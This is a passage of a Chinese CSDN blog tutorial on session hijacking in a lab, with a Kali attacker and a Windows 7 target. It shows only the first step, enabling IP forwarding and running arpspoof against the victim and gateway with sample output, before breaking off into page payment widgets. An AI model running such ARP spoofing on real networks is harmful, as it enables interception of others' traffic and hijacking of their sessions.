会话劫持二—设置代理IP劫持释放流量

本文介绍了如何在Kali Linux中利用Arpspoof进行ARP欺骗,然后通过Ferret指定劫持网卡,最后使用Hamster重放流量进行会话劫持。在实验环境中,攻击机是Kali,靶机是Win 7,通过这样的步骤可以实现对网络流量的实时劫持与分析。
摘要由CSDN通过智能技术生成

实验环境

攻击机kali   IP:192.168.3.147
靶机win 7    IP:192.168.3.128

工具

arpspoof     进行arp欺骗
ferret        指定劫持网卡
hamster      劫持重放流量

1.首先使用arpspoof进行arp欺骗

root@afei:~# echo 1 > /proc/sys/net/ipv4/ip_forward
root@afei:~# cat /proc/sys/net/ipv4/ip_forward
1
root@afei:~# arpspoof -i eth1 -t 192.168.3.128 192.168.3.2
0:c:29:fa:a7:a3 0:c:29:3c:60:ad 0806 42: arp reply 192.168.3.2 is-at 0:c:29:fa:a7:a3
...

2.使用ferre

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

afei00123

您的支持是我创作最大的动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值